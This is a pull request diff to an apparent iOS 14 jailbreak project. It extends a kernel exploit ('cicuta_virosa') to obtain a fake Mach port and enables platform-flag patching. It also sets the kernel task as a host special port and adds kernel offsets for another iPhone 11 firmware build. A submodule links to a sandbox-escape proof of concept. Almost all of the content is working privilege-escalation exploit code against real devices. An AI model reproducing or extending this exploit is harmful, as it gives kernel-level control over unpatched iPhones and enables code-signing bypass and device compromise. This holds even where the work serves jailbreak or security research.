### PR TITLE
Add link to the jb_resources folder that was used in exploit

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,1 @@
+.DS_Store

--- a/.gitmodules
+++ b/.gitmodules
@@ -1,0 +1,3 @@
+[submodule ".zecops"]
+	path = .zecops
+	url = https://github.com/ZecOps/FreeTheSandbox_LPE_POC_13.7.git

--- a/README.md
+++ b/README.md
@@ -19,7 +19,7 @@ Implemented an arbitrary r/w primitive based on [cicuta\_virosa](https://github.
 
 Tested on iPhone 12 pro (**iOS 14.3**).
 
-Tested on iPhone 11 (**iOS 14.0**).
+Tested on iPhone 11 (**iOS 14.0 and iOS 14.2**).
 
 Tested on iPhone 6s (**iOS 14.0**). Maybe helpful to A11 devices. I note that checkra1n said "Limited support for A11 devices on iOS 14.x".
 

--- a/Resources/jb_resources_compress.zip
+++ b/Resources/jb_resources_compress.zip
@@ -1,0 +1,1 @@
+.zecops/ios13_app1/jb_resources_compress.zip

--- a/exploit-main/cicuta_virosa/cicuta_virosa.c
+++ b/exploit-main/cicuta_virosa/cicuta_virosa.c
@@ -318,6 +318,10 @@ stage1:
         ports[i] = cv_new_mach_port();
     }
 
+    
+    int port_i = 0;
+#define POP_PORT() ports[port_i++]
+    
     release_fake_element_spray_at(next_spray_index);
     for (uint32_t i = 0; i < OOL_PORTS_SPRAY; ++i)
     {

--- a/exploit-main/cicuta_virosa/cicuta_virosa.c
+++ b/exploit-main/cicuta_virosa/cicuta_virosa.c
@@ -381,6 +381,20 @@ stage1:
     util_info("Stage 4 (DEMO): pwn kernel");
 
     g_exp.self_task = buf[0] | 0xffffff8000000000;
+    
+    mach_port_t ool_message_port = POP_PORT();
+    struct ool_msg *ool = (struct ool_msg *)cv_receive_message(ool_message_port, sizeof(struct ool_msg) + 0x1000);
+    free(ool);
+    mach_port_t fakeport = ((mach_port_t *)ool->ool_ports.address)[0];
+    if (!fakeport) {
+        cicuta_log("[-] Didn't get fakeport???\n");
+        goto err;
+    }
+    cicuta_log("got fakeport\n");
+    
+    
+    g_exp.fakeport = fakeport;
+    
 #if 0
 // offsets is hardcoded for A12-14!!! Change it for your device!!!
     uint64_t task_pac = buf[0];

--- a/exploit-main/post_exploit.c
+++ b/exploit-main/post_exploit.c
@@ -25,10 +25,16 @@
 
 #define copyfile(X,Y) (copyfile)(X, Y, 0, COPYFILE_ALL|COPYFILE_RECURSIVE|COPYFILE_NOFOLLOW_SRC);
 #define JAILB_ROOT "/private/var/containers/Bundle/jb_resources/"
+
+uint64_t amfid_base = 0;
+mach_port_t amfid_exception_port = MACH_PORT_NULL;
+
 static const char *jailb_root = JAILB_ROOT;
 
 char *Build_resource_path(char *filename);
+
 void patch_amfid(pid_t amfid_pid);
+
 
 #define PROC_ALL_PIDS        1
 extern int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize);
@@ -135,7 +141,7 @@ void proc_set_root_cred(kptr_t proc, struct proc_cred **old_cred)
 
 void proc_restore_cred(kptr_t proc, struct proc_cred *old_cred)
 {
-    // TODO
+    // TODO if you restore the processes credentials this will keep stuff from kernel panicking on app exit.
 }
 
 #pragma mark ---- Post-exp main entry ----
@@ -159,7 +165,7 @@ void post_exploit(void)
         FILE *fp = fopen("/var/mobile/test.txt", "wb");
         fail_if(fp == NULL, "failed to write /var/mobile/test.txt");
         util_info("wrote test file: %p", fp);
-        fprintf(fp, "hello from pattern-f\n");
+        fprintf(fp, "hello\n");
         fclose(fp);
     }
 
@@ -168,11 +174,16 @@ void post_exploit(void)
     //util_runCommand("/bin/ls", NULL); // not privided by Apple
     util_runCommand("/bin/ps", "-p", "1", NULL); // built-in tools
 
-    //patch_TF_PLATFORM(g_exp.self_task);
+    patch_TF_PLATFORM(g_exp.self_task);
 
     // ----------------------------------------------------------------------
     //
     util_info("TODO insert your code here");
+    //set special port access...this is kind of like task_for_pid giving us kernel task but from how I understand John levins explanation we have the same access as task_for_pid
+    host_set_special_port(HOST_LOCAL_NODE, 4, g_exp.fakeport);
+    
+    util_info("Setup Specialport for iOS14");
+    
     //
     // ----------------------------------------------------------------------
 

--- a/mylib/k_offsets.c
+++ b/mylib/k_offsets.c
@@ -87,6 +87,16 @@ static void offsets_iPhone11_18A373()
     kc_IOSurfaceClient_vt_0 = 0xFFFFFFF00867A778;
 }
 
+static void offsets_iPhone11_18B92()
+{
+    offsets_base_iOS_14_x();
+
+    kc_kernel_map = 0xfffffff0076fc910;
+    kc_kernel_task = 0xfffffff0076f8c80;
+    kc_IOSurfaceClient_vt = 0xfffffff00785d7f8;
+    kc_IOSurfaceClient_vt_0 = 0xfffffff0086dacdc;
+}
+
 static void offsets_iPhone12pro_18C66()
 {
     offsets_base_iOS_14_x();
@@ -109,6 +119,7 @@ static struct device_def devices[] = {
     { "iPhone 11", "N104AP", "18A373", offsets_iPhone11_18A373 },
     { "iPhone 12", "D53gAP", "18A8395", offsets_iPhone12_18A8395 },
     { "iPhone 12 pro", "D53pAP", "18C66", offsets_iPhone12pro_18C66 },
+    { "iPhone 11", "N104AP", "18B92", offsets_iPhone11_18B92 }
 };
 
 void kernel_offsets_init(void)

--- a/mylib/mycommon.h
+++ b/mylib/mycommon.h
@@ -39,6 +39,7 @@ struct exploit_common_s {
     kptr_t data_slide;
     kptr_t zone_array;
     uint32_t num_zones;
+    mach_port_t fakeport;
 };
 
 extern struct exploit_common_s g_exp;


### PR DESCRIPTION
Add submodule to the zecops repo that holds the jb_resources zip along with the folder that holds it 
repo now needs to be cloned using --recursive 


Signed-off-by: Bryan Smith <bryan.smith@mobomo.com>